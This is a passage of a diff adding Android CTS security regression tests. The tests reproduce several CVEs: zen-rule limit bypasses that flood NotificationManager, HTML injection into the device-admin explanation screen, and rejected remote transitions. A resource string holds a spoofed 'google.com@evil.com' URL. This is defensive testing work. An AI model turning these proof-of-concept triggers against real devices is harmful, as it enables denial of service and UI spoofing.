+++ b/tests/tests/security/res/raw/sig_test_cert_4.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_testcert.bin b/tests/tests/security/res/raw/sig_testcert.bin
new file mode 100644
index 0000000..cae337e
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_testcert.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_unit_test.bin b/tests/tests/security/res/raw/sig_unit_test.bin
new file mode 100644
index 0000000..4dbbc49
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_unit_test.bin
Binary files differ
diff --git a/tests/tests/security/res/values/integers_CVE_2022_20429.xml b/tests/tests/security/res/values/integers_CVE_2022_20429.xml
new file mode 100644
index 0000000..a9d10ff
--- /dev/null
+++ b/tests/tests/security/res/values/integers_CVE_2022_20429.xml
@@ -0,0 +1,24 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright 2023 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+ -->
+
+<resources>
+ <integer name="cve_2022_20429_disable">2</integer>
+ <integer name="cve_2022_20429_enable">1</integer>
+ <integer name="cve_2022_20429_failure">-1</integer>
+ <integer name="cve_2022_20429_success">0</integer>
+ <integer name="cve_2022_20429_timeoutMs">20000</integer>
+</resources>
diff --git a/tests/tests/security/res/values/strings.xml b/tests/tests/security/res/values/strings.xml
index ee1f73e..3423f32 100644
--- a/tests/tests/security/res/values/strings.xml
+++ b/tests/tests/security/res/values/strings.xml
@@ -32,4 +32,31 @@
<string name="cve_2022_20338_invalidURL">https://google.com@evil.com</string>
<string name="cve_2022_20338_path">@evil.com</string>
<string name="cve_2022_20338_scheme">https</string>
+
+ <!-- CVE-2023-20960 -->
+ <string name="cve_2023_20960_dumpsysActivityCmd">dumpsys activity %1$s</string>
+ <string name="cve_2023_20960_failMsg">Device is vulnerable to b/250589026, Unexported
+ activities can be launched using ACTION_SETTINGS_EMBED_DEEP_LINK_ACTIVITY</string>
+ <string name="cve_2023_20960_forwardSlash">/</string>
+ <string name="cve_2023_20960_mResumedTruePattern">.*mResumed=true.*</string>
+ <string name="cve_2023_20960_settingsPackageName">com.android.settings</string>
+ <string name="cve_2023_20960_unexportedActivity">.security.InstallCaCertificateWarning</string>
+ <string name="cve_2023_20960_uriStringComponent">component=</string>
+ <string name="cve_2023_20960_uriStringIntent">intent:#Intent;</string>
+ <string name="cve_2023_20960_uriStringSuffix">;end</string>
+
+ <!-- CVE-2021-0600 -->
+ <string name="cve_2021_0600_action">CVE_2021_0600_action</string>
+ <string name="cve_2021_0600_errorCreateCharSeq">Failed to create a charsequence to contain HTML
+ text</string>
+ <string name="cve_2021_0600_failMsg">Vulnerable to b/179042963 !!</string>
+ <string name="cve_2021_0600_intentNotFound">Failed to resolve %1$s</string>
+ <string name="cve_2021_0600_keyException">exception</string>
+ <string name="cve_2021_0600_keyHtml">html</string>
+ <string name="cve_2021_0600_noException">noException</string>
+ <string name="cve_2021_0600_pattern">.*CVE_2021_0600_EXPN.*</string>
+ <string name="cve_2021_0600_patternNotFound">UI element with text pattern %1$s not found
+ </string>
+ <string name="cve_2021_0600_targetText">CVE_2021_0600_EXPN</string>
+ <string name="cve_2021_0600_targetTextHtml"><![CDATA[<h1>CVE_2021_0600_EXPN</h1>]]></string>
</resources>
diff --git a/tests/tests/security/res/values/strings_CVE_2022_20429.xml b/tests/tests/security/res/values/strings_CVE_2022_20429.xml
new file mode 100644
index 0000000..f515bcf
--- /dev/null
+++ b/tests/tests/security/res/values/strings_CVE_2022_20429.xml
@@ -0,0 +1,28 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright 2023 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+ -->
+
+<resources>
+ <string name="cve_2022_20429_allowButtonResKey">allow</string>
+ <string name="cve_2022_20429_broadcastAction">testBluetoothModeChangeBroadcastAction</string>
+ <string name="cve_2022_20429_btAction">btAction</string>
+ <string name="cve_2022_20429_carSettingsPackageName">com.android.car.settings</string>
+ <string name="cve_2022_20429_failMsg">Device is vulnerable to b/220741473!!</string>
+ <string name="cve_2022_20429_featureMissing">Skipping test: %1$s missing.</string>
+ <string name="cve_2022_20429_messageKey">message</string>
+ <string name="cve_2022_20429_resType">string</string>
+ <string name="cve_2022_20429_resultKey">result</string>
+</resources>
diff --git a/tests/tests/security/res/values/strings_CVE_2023_21143.xml b/tests/tests/security/res/values/strings_CVE_2023_21143.xml
new file mode 100644
index 0000000..cef10c7
--- /dev/null
+++ b/tests/tests/security/res/values/strings_CVE_2023_21143.xml
@@ -0,0 +1,27 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright 2023 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+ -->
+
+<resources>
+ <string name="channelId">notification_channel_id</string>
+ <string name="channelName">notification_channel_name</string>
+ <string name="failMsg">Device is vulnerable to b/268193777 !!</string>
+ <string name="noPidFound">No pid found for com.android.systemui</string>
+ <string name="notificationSendingFailed">notification has not been sent successfully</string>
+ <string name="notificationText">notification_text</string>
+ <string name="shellCommandForHome">input keyevent KEYCODE_HOME</string>
+ <string name="systemuiPidCommand">pidof com.android.systemui</string>
+</resources>
diff --git a/tests/tests/security/res/xml/device_admin_cve_2021_0600.xml b/tests/tests/security/res/xml/device_admin_cve_2021_0600.xml
new file mode 100644
index 0000000..2b7410c
--- /dev/null
+++ b/tests/tests/security/res/xml/device_admin_cve_2021_0600.xml
@@ -0,0 +1,20 @@
+<?xml version ="1.0" encoding ="utf-8"?>
+<!--
+ Copyright 2023 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+ -->
+
+<device-admin>
+ <uses-policies />
+</device-admin>
diff --git a/tests/tests/security/src/android/security/cts/ActivityManagerTest.java b/tests/tests/security/src/android/security/cts/ActivityManagerTest.java
index b380472..880c5c6 100644
--- a/tests/tests/security/src/android/security/cts/ActivityManagerTest.java
+++ b/tests/tests/security/src/android/security/cts/ActivityManagerTest.java
@@ -258,6 +258,82 @@
assertNull(activity.mReceivedTransition);
}
+ @AsbSecurityTest(cveBugId = 286882367)
+ @Test
+ public void testActivityManager_rejectRemoteTransition() throws Exception {
+ Context targetContext = getInstrumentation().getTargetContext();
+ final Intent baseIntent = new Intent(targetContext, WaitEnterAnimActivity.class);
+ baseIntent.setFlags(FLAG_ACTIVITY_NO_USER_ACTION | FLAG_ACTIVITY_NEW_TASK);
+
+ final boolean[] remoteCalled = new boolean[]{false};
+ RemoteTransition someRemote = new RemoteTransition(new IRemoteTransition.Stub() {
+ @Override
+ public void startAnimation(IBinder token, TransitionInfo info,
+ SurfaceControl.Transaction t,
+ IRemoteTransitionFinishedCallback finishCallback) throws RemoteException {
+ remoteCalled[0] = true;
+ t.apply();
+ finishCallback.onTransitionFinished(null /* wct */, null /* sct */);
+ }
+
+ @Override
+ public void mergeAnimation(IBinder token, TransitionInfo info,
+ SurfaceControl.Transaction t, IBinder mergeTarget,
+ IRemoteTransitionFinishedCallback finishCallback) throws RemoteException {
+ remoteCalled[0] = true;
+ }
+ });
+ ActivityOptions opts = ActivityOptions.makeRemoteTransition(someRemote);
+
+ boolean securityException = false;
+ final WaitEnterAnimActivity baseActivity;
+ try {
+ baseActivity = (WaitEnterAnimActivity)
+ getInstrumentation().startActivitySync(baseIntent, opts.toBundle());
+ assertTrue(waitUntil(() -> baseActivity.mAnimComplete));
+ } catch (SecurityException se) {
+ securityException = true;
+ }
+
+ assertFalse(remoteCalled[0]);
+ assertTrue(securityException);
+ }
+
+ @AsbSecurityTest(cveBugId = 289549315)
+ @Test
+ public void testActivityManager_backupAgentCreated_rejectIfCallerUidNotEqualsPackageUid()
+ throws Exception {
+ SecurityException securityException = null;
+ Exception unexpectedException = null;
+ try {
+ final Object iam = ActivityManager.class.getDeclaredMethod("getService").invoke(null);
+ Class.forName("android.app.IActivityManager").getDeclaredMethod("backupAgentCreated",
+ String.class, IBinder.class, int.class)
+ .invoke(iam, /* agentPackageName*/ "android", /* agent */ null, /* userId */ 0);
+ } catch (SecurityException e) {
+ securityException = e;
+ } catch (InvocationTargetException e) {
+ if (e.getCause() instanceof SecurityException) {
+ securityException = (SecurityException) e.getCause();
+ } else {
+ unexpectedException = e;
+ }
+ } catch (Exception e) {
+ unexpectedException = e;
+ }
+ if (unexpectedException != null) {
+ Log.w("ActivityManagerTest", "Unexpected exception", unexpectedException);
+ fail("ActivityManagerNative.backupAgentCreated() API should have thrown "
+ + "SecurityException when invoked from process with uid not matching target "
+ + "package uid.");
+ }
+
+ assertNotNull("Expected SecurityException when caller's uid doesn't match package uid",
+ securityException);
+ assertEquals("android does not belong to uid " + Process.myUid(),
+ securityException.getMessage());
+ }
+
/**
* Run ActivityManager.getHistoricalProcessExitReasons once, return the time spent on it.
*/
@@ -325,6 +401,15 @@
}
}
+ public static class WaitEnterAnimActivity extends Activity {
+ public boolean mAnimComplete = false;
+
+ @Override
+ public void onEnterAnimationComplete() {
+ mAnimComplete = true;
+ }
+ }
+
public static class ActivityOptionsActivity extends Activity {
public RemoteTransition mReceivedTransition = null;
public boolean mPreCreate = false;
diff --git a/tests/tests/security/src/android/security/cts/AutomaticZenRuleTests/AutomaticZenRuleTests.java b/tests/tests/security/src/android/security/cts/AutomaticZenRuleTests/AutomaticZenRuleTests.java
new file mode 100644
index 0000000..5579026
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/AutomaticZenRuleTests/AutomaticZenRuleTests.java
@@ -0,0 +1,207 @@
+/*
+ * Copyright (C) 2022 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.AutomaticZenRuleTests;
+
+import static org.junit.Assert.assertFalse;
+import static org.junit.Assume.assumeNoException;
+import static org.junit.Assume.assumeTrue;
+
+import android.app.AutomaticZenRule;
+import android.app.Instrumentation;
+import android.app.NotificationManager;
+import android.app.UiAutomation;
+import android.content.ComponentName;
+import android.content.Context;
+import android.net.Uri;
+import android.platform.test.annotations.AsbSecurityTest;
+import androidx.test.InstrumentationRegistry;
+import androidx.test.runner.AndroidJUnit4;
+
+import com.android.sts.common.util.StsExtraBusinessLogicTestCase;
+
+import org.junit.After;
+import org.junit.Before;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import java.util.ArrayList;
+
+@RunWith(AndroidJUnit4.class)
+public class AutomaticZenRuleTests extends StsExtraBusinessLogicTestCase {
+ private static final String URI_STRING = "condition://android";
+ private static final String ZEN_RULE_NAME = "ZenRuleName";
+ private boolean mNotificationPolicyAccessGranted = false;
+ private NotificationManager mNotificationManager = null;
+ private String mPackageName = null;
+ private UiAutomation mUiautomation = null;
+
+ @Before
+ public void setUp() {
+ try {
+ final int timeoutDuration = 5000;
+ final int waitDuration = 100;
+ Instrumentation instrumentation = InstrumentationRegistry.getInstrumentation();
+ Context context = instrumentation.getContext();
+ mNotificationManager = context.getSystemService(NotificationManager.class);
+ mPackageName = context.getPackageName();
+ mUiautomation = instrumentation.getUiAutomation();
+ mUiautomation.executeShellCommand("cmd notification allow_dnd " + mPackageName);
+ long startTime = System.currentTimeMillis();
+ while (System.currentTimeMillis() - startTime < timeoutDuration) {
+ // Busy wait until notification policy access is granted
+ if (mNotificationManager.isNotificationPolicyAccessGranted()) {
+ mNotificationPolicyAccessGranted = true;
+ break;
+ }
+ Thread.sleep(waitDuration);
+ }
+ assumeTrue("Notification policy access not granted", mNotificationPolicyAccessGranted);
+ } catch (Exception e) {
+ assumeNoException(e);
+ }
+ }
+
+ @After
+ public void tearDown() {
+ try {
+ mUiautomation.executeShellCommand("cmd notification disallow_dnd " + mPackageName);
+ } catch (Exception ignoredException) {
+ // Ignoring exceptions
+ }
+ }
+
+ private boolean testUsingAppComponents(ComponentName owner, ComponentName components[]) {
+ int automaticZenRules = 0;
+ boolean isVulnerable = true;
+ final int ruleLimitPerPackage = (components != null && components.length > 1) ? 60 : 200;
+ ArrayList<String> ruleIds = new ArrayList<>();
+ try {
+ // Storing the number of automaticZenRules present before test run
+ automaticZenRules = mNotificationManager.getAutomaticZenRules().size();
+
+ for (int i = 0; i < ruleLimitPerPackage; ++i) {
+ if (components != null) {
+ for (int j = 0; j < components.length; ++j) {
+ int ruleNo = i * components.length + j;
+ Uri conditionId = Uri.parse(URI_STRING + ruleNo);
+ AutomaticZenRule rule = new AutomaticZenRule(ZEN_RULE_NAME + ruleNo, owner,
+ components[j], conditionId, null,
+ NotificationManager.INTERRUPTION_FILTER_ALL, true);
+ String id = mNotificationManager.addAutomaticZenRule(rule);
+ ruleIds.add(id);
+ }
+ } else {
+ Uri conditionId = Uri.parse(URI_STRING + i);
+ AutomaticZenRule rule = new AutomaticZenRule(ZEN_RULE_NAME + i, owner, null,
+ conditionId, null, NotificationManager.INTERRUPTION_FILTER_ALL, true);
+ String id = mNotificationManager.addAutomaticZenRule(rule);
+ ruleIds.add(id);
+ }
+ }
+ } catch (Exception e) {
+ isVulnerable = false;
+ if (!(e instanceof IllegalArgumentException)) {
+ assumeNoException(e);
+ }
+ } finally {
+ try {
+ if (mNotificationPolicyAccessGranted) {
+ // Retrieving the total number of automaticZenRules added by test so that the
+ // test fails only if all automaticZenRules were added successfully
+ automaticZenRules =
+ mNotificationManager.getAutomaticZenRules().size() - automaticZenRules;
+ for (String id : ruleIds) {
+ mNotificationManager.removeAutomaticZenRule(id);
+ }
+ }
+ int ruleLimitPerPackageTotal =
+ components != null ? ruleLimitPerPackage * components.length
+ : ruleLimitPerPackage;
+ boolean allZenRulesAdded = ruleLimitPerPackageTotal == automaticZenRules;
+ isVulnerable = (isVulnerable && allZenRulesAdded);
+ } catch (Exception ignoredException) {
+ // Ignoring exceptions
+ }
+ }
+ return isVulnerable;
+ }
+
+ // b/220735360
+ // Vulnerable library : framework.jar
+ // Vulnerable module : Not applicable
+ // Is Play managed : No
+ @AsbSecurityTest(cveBugId = 220735360)
+ @Test
+ public void testPocCVE_2022_20143() {
+ try {
+ ComponentName appComponent =
+ new ComponentName(mPackageName, PocActivity.class.getCanonicalName());
+ ComponentName[] components = {appComponent};
+ boolean testUsingAppSingleComponentStatus = testUsingAppComponents(null, components);
+ assertFalse("Device is vulnerable to b/220735360!! System can be corrupted by adding"
+ + " many automaticZenRules via NotificationManager#addAutomaticZenRule."
+ + " Note: Device also seems to be vulnerable to b/235823407 and"
+ + " b/242537431", testUsingAppSingleComponentStatus);
+ } catch (Exception e) {
+ assumeNoException(e);
+ }
+ }
+
+ // b/235823407
+ // Vulnerable library : framework.jar
+ // Vulnerable module : Not applicable
+ // Is Play managed : No
+ @AsbSecurityTest(cveBugId = 235823407)
+ @Test
+ public void testPocCVE_2022_20425() {
+ try {
+ ComponentName firstConfigurationActivity =
+ new ComponentName(mPackageName, PocActivity.class.getCanonicalName());
+ ComponentName secondConfigurationActivity =
+ new ComponentName(mPackageName, SecondPocActivity.class.getCanonicalName());
+ ComponentName[] components = {firstConfigurationActivity, secondConfigurationActivity};
+ boolean testUsingAppMultipleComponentStatus = testUsingAppComponents(null, components);
+ assertFalse(
+ "Device is vulnerable to b/235823407!! Bypass fix of CVE-2022-20143:"
+ + " Bypass zen rule limit with different configuration Activity"
+ + " Note: Device also seems to be vulnerable to b/242537431",
+ testUsingAppMultipleComponentStatus);
+ } catch (Exception e) {
+ assumeNoException(e);
+ }
+ }
+
+ // b/242537431
+ // Vulnerable library : framework.jar
+ // Vulnerable module : Not applicable
+ // Is Play managed : No
+ @AsbSecurityTest(cveBugId = 242537431)
+ @Test
+ public void testPocCVE_2022_20455() {
+ try {
+ ComponentName systemComponent =
+ new ComponentName("android", "ScheduleConditionProvider");
+ boolean testUsingSystemComponentStatus = testUsingAppComponents(systemComponent, null);
+ assertFalse(
+ "Device is vulnerable to b/242537431!! System can be corrupted by adding"
+ + " many automaticZenRules via NotificationManager#addAutomaticZenRule",
+ testUsingSystemComponentStatus);
+ } catch (Exception e) {
+ assumeNoException(e);
+ }
+ }
+}
diff --git a/tests/tests/security/src/android/security/cts/CVE_2022_20143/PocActivity.java b/tests/tests/security/src/android/security/cts/AutomaticZenRuleTests/PocActivity.java
similarity index 92%
rename from tests/tests/security/src/android/security/cts/CVE_2022_20143/PocActivity.java
rename to tests/tests/security/src/android/security/cts/AutomaticZenRuleTests/PocActivity.java
index 4416990..99ba57f 100644
--- a/tests/tests/security/src/android/security/cts/CVE_2022_20143/PocActivity.java
+++ b/tests/tests/security/src/android/security/cts/AutomaticZenRuleTests/PocActivity.java
@@ -14,7 +14,7 @@
* limitations under the License.
*/
-package android.security.cts.CVE_2022_20143;
+package android.security.cts.AutomaticZenRuleTests;
import android.app.Activity;
diff --git a/tests/tests/security/src/android/security/cts/CVE_2022_20143/PocActivity.java b/tests/tests/security/src/android/security/cts/AutomaticZenRuleTests/SecondPocActivity.java
similarity index 86%
copy from tests/tests/security/src/android/security/cts/CVE_2022_20143/PocActivity.java
copy to tests/tests/security/src/android/security/cts/AutomaticZenRuleTests/SecondPocActivity.java
index 4416990..0209c9d 100644
--- a/tests/tests/security/src/android/security/cts/CVE_2022_20143/PocActivity.java
+++ b/tests/tests/security/src/android/security/cts/AutomaticZenRuleTests/SecondPocActivity.java
@@ -14,9 +14,9 @@
* limitations under the License.
*/
-package android.security.cts.CVE_2022_20143;
+package android.security.cts.AutomaticZenRuleTests;
import android.app.Activity;
-public class PocActivity extends Activity {
+public class SecondPocActivity extends Activity {
}
diff --git a/tests/tests/security/src/android/security/cts/CVE_2021_0600/CVE_2021_0600.java b/tests/tests/security/src/android/security/cts/CVE_2021_0600/CVE_2021_0600.java
new file mode 100644
index 0000000..7981c42
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/CVE_2021_0600/CVE_2021_0600.java
@@ -0,0 +1,137 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2021_0600;
+
+import static androidx.test.platform.app.InstrumentationRegistry.getInstrumentation;
+
+import static org.junit.Assert.assertFalse;
+import static org.junit.Assume.assumeNoException;
+import static org.junit.Assume.assumeTrue;
+
+import android.app.Instrumentation;
+import android.content.BroadcastReceiver;
+import android.content.Context;
+import android.content.Intent;
+import android.content.IntentFilter;
+import android.graphics.Rect;
+import android.platform.test.annotations.AsbSecurityTest;
+import android.security.cts.R;
+import android.support.test.uiautomator.By;
+import android.support.test.uiautomator.BySelector;
+import android.support.test.uiautomator.UiDevice;
+import android.support.test.uiautomator.UiObject2;
+import android.support.test.uiautomator.Until;
+
+import androidx.test.runner.AndroidJUnit4;
+
+import com.android.sts.common.util.StsExtraBusinessLogicTestCase;
+
+import java.util.concurrent.CompletableFuture;
+import java.util.concurrent.TimeUnit;
+import java.util.regex.Pattern;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(AndroidJUnit4.class)
+public class CVE_2021_0600 extends StsExtraBusinessLogicTestCase {
+ private static final long TIMEOUT_MS = 5000;
+ private CompletableFuture<String> mPocActivityReturn;
+ private UiDevice mDevice;
+ private Context mContext;
+
+ // b/179042963
+ // Vulnerable package : com.android.settings (As per AOSP code)
+ // Vulnerable app : Settings.apk (As per AOSP code)
+ @AsbSecurityTest(cveBugId = 179042963)
+ @Test
+ public void testPocCVE_2021_0600() {
+ try {
+ Instrumentation instrumentation = getInstrumentation();
+ mDevice = UiDevice.getInstance(instrumentation);
+ mContext = instrumentation.getContext();
+
+ // Registering a broadcast receiver to receive broadcast from PocActivity.
+ mPocActivityReturn = new CompletableFuture<>();
+ BroadcastReceiver broadcastReceiver = new BroadcastReceiver() {
+ @Override
+ public void onReceive(Context context, Intent intent) {
+ try {
+ mPocActivityReturn.complete(intent.getStringExtra(
+ mContext.getString(R.string.cve_2021_0600_keyException)));
+ } catch (Exception e) {
+ // ignore.
+ }
+ }
+ };
+ mContext.registerReceiver(broadcastReceiver,
+ new IntentFilter(mContext.getString(R.string.cve_2021_0600_action)));
+
+ // Launch the PocActivity which in turn starts DeviceAdminAdd activity with normal
+ // text as 'explanation'.
+ Intent intent = new Intent(mContext, PocActivity.class);
+ intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK | Intent.FLAG_ACTIVITY_CLEAR_TASK);
+ intent.putExtra(mContext.getString(R.string.cve_2021_0600_keyHtml), false);
+ mContext.startActivity(intent);
+ String pocActivityException = mPocActivityReturn.get(TIMEOUT_MS, TimeUnit.MILLISECONDS);
+ assumeTrue(pocActivityException, pocActivityException.trim()
+ .equals(mContext.getString(R.string.cve_2021_0600_noException)));
+
+ // Get the height of the normal text with no formatting. Because width is same both
+ // with and without fix, height is being used for comparing the with and without
+ // fix behaviour.
+ int heightWoHtml = getVulnerableUIHeight();
+ assumeTrue(heightWoHtml != -1);
+
+ // Launch PocActivity again such that DeviceAdminAdd activity starts with formatted text
+ // this time.
+ mPocActivityReturn = new CompletableFuture<>();
+ intent.putExtra(mContext.getString(R.string.cve_2021_0600_keyHtml), true);
+ mContext.startActivity(intent);
+ pocActivityException = mPocActivityReturn.get(TIMEOUT_MS, TimeUnit.MILLISECONDS);
+ assumeTrue(pocActivityException, pocActivityException
+ .equalsIgnoreCase(mContext.getString(R.string.cve_2021_0600_noException)));
+
+ // Get the height of HTML text with formatting.
+ int heightWithHtml = getVulnerableUIHeight();
+ assumeTrue(heightWithHtml != -1);
+
+ // On vulnerable device, the text displayed on the screen will be HTML formatted, so
+ // there will be considerable increase in height of the text due to <h1> tag, if there
+ // is at least 20% increase in height, the test will fail.
+ assertFalse(mContext.getString(R.string.cve_2021_0600_failMsg),
+ heightWithHtml > 1.2 * heightWoHtml);
+ } catch (Exception e) {
+ assumeNoException(e);
+ }
+ }
+
+ private int getVulnerableUIHeight() {
+ Pattern pattern = Pattern.compile(mContext.getString(R.string.cve_2021_0600_pattern),
+ Pattern.CASE_INSENSITIVE);
+ BySelector selector = By.text(pattern);
+ assumeTrue(mContext.getString(R.string.cve_2021_0600_patternNotFound, pattern),
+ mDevice.wait(Until.hasObject(selector), TIMEOUT_MS));
+ UiObject2 obj = mDevice.findObject(selector);
+ if (obj != null && obj.getText() != null
+ && obj.getText().contains(mContext.getString(R.string.cve_2021_0600_targetText))) {
+ Rect bounds = obj.getVisibleBounds();
+ return bounds.bottom - bounds.top;
+ }
+ return -1;
+ }
+}
diff --git a/tests/tests/security/src/android/security/cts/CVE_2021_0600/PocActivity.java b/tests/tests/security/src/android/security/cts/CVE_2021_0600/PocActivity.java
new file mode 100644
index 0000000..2634a42
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/CVE_2021_0600/PocActivity.java
@@ -0,0 +1,86 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2021_0600;
+
+import static org.junit.Assume.assumeFalse;
+import static org.junit.Assume.assumeNotNull;
+
+import android.app.Activity;
+import android.app.admin.DevicePolicyManager;
+import android.content.ComponentName;
+import android.content.Intent;
+import android.os.Bundle;
+import android.security.cts.R;
+import android.text.Html;
+
+// The vulnerable activity ADD_DEVICE_ADMIN can't be started as a new task hence PocActivity is
+// created to launch it.
+public class PocActivity extends Activity {
+
+ @Override
+ protected void onCreate(Bundle savedInstanceState) {
+ try {
+ super.onCreate(savedInstanceState);
+
+ // Create an intent to launch DeviceAdminAdd activity.
+ Intent intent = new Intent(DevicePolicyManager.ACTION_ADD_DEVICE_ADMIN);
+ assumeNotNull(getString(R.string.cve_2021_0600_intentNotFound, intent),
+ intent.resolveActivity(getPackageManager()));
+ intent.putExtra(DevicePolicyManager.EXTRA_DEVICE_ADMIN,
+ new ComponentName(this, PocDeviceAdminReceiver.class));
+
+ // For adding an extra 'explanation' to the intent, creating a charsequence object.
+ CharSequence seq = Html.fromHtml(getString(R.string.cve_2021_0600_targetText));
+ if (getIntent().getBooleanExtra(getString(R.string.cve_2021_0600_keyHtml), false)) {
+ seq = Html.fromHtml(getString(R.string.cve_2021_0600_targetTextHtml));
+ }
+
+ // Using Html.fromHtml() causes whitespaces to occur at the start/end of the text which
+ // are unwanted. Remove the whitespace characters if any at the start and end of the
+ // charsequence.
+ int end = seq.length() - 1;
+ int start = 0;
+ while ((Character.isWhitespace(seq.charAt(start))) && start < end) {
+ ++start;
+ }
+ while ((Character.isWhitespace(seq.charAt(end))) && end > start) {
+ --end;
+ }
+
+ // Check if the charsequence is valid after trimming the whitespaces.
+ assumeFalse(getString(R.string.cve_2021_0600_errorCreateCharSeq), start > end);
+
+ // Adding the extra 'explanation' and launching the activity.
+ intent.putExtra(DevicePolicyManager.EXTRA_ADD_EXPLANATION,
+ seq.subSequence(start, end + 1));
+ startActivity(intent);
+
+ // Send a broadcast to indicate no exceptions occurred.
+ sendBroadcast(new Intent(getString(R.string.cve_2021_0600_action)).putExtra(
+ getString(R.string.cve_2021_0600_keyException),
+ getString(R.string.cve_2021_0600_noException)));
+ } catch (Exception e) {
+ try {
+ // Send a broadcast to report exception.
+ sendBroadcast(new Intent(getString(R.string.cve_2021_0600_action))
+ .putExtra(getString(R.string.cve_2021_0600_keyException), e.getMessage()));
+ } catch (Exception ignored) {
+ // ignore.
+ }
+ }
+ }
+}
diff --git a/tests/tests/security/src/android/security/cts/CVE_2022_20143/PocActivity.java b/tests/tests/security/src/android/security/cts/CVE_2021_0600/PocDeviceAdminReceiver.java
similarity index 72%
copy from tests/tests/security/src/android/security/cts/CVE_2022_20143/PocActivity.java
copy to tests/tests/security/src/android/security/cts/CVE_2021_0600/PocDeviceAdminReceiver.java
index 4416990..4d429cf 100644
--- a/tests/tests/security/src/android/security/cts/CVE_2022_20143/PocActivity.java
+++ b/tests/tests/security/src/android/security/cts/CVE_2021_0600/PocDeviceAdminReceiver.java
@@ -1,5 +1,5 @@
/*
- * Copyright (C) 2022 The Android Open Source Project
+ * Copyright (C) 2023 The Android Open Source Project
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
@@ -14,9 +14,9 @@
* limitations under the License.
*/
-package android.security.cts.CVE_2022_20143;
+package android.security.cts.CVE_2021_0600;
-import android.app.Activity;
+import android.app.admin.DeviceAdminReceiver;
-public class PocActivity extends Activity {
+public class PocDeviceAdminReceiver extends DeviceAdminReceiver {
}
diff --git a/tests/tests/security/src/android/security/cts/CVE_2021_39738.java b/tests/tests/security/src/android/security/cts/CVE_2021_39738.java
new file mode 100644
index 0000000..7d8daea
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/CVE_2021_39738.java
@@ -0,0 +1,64 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import static androidx.test.core.app.ApplicationProvider.getApplicationContext;
+
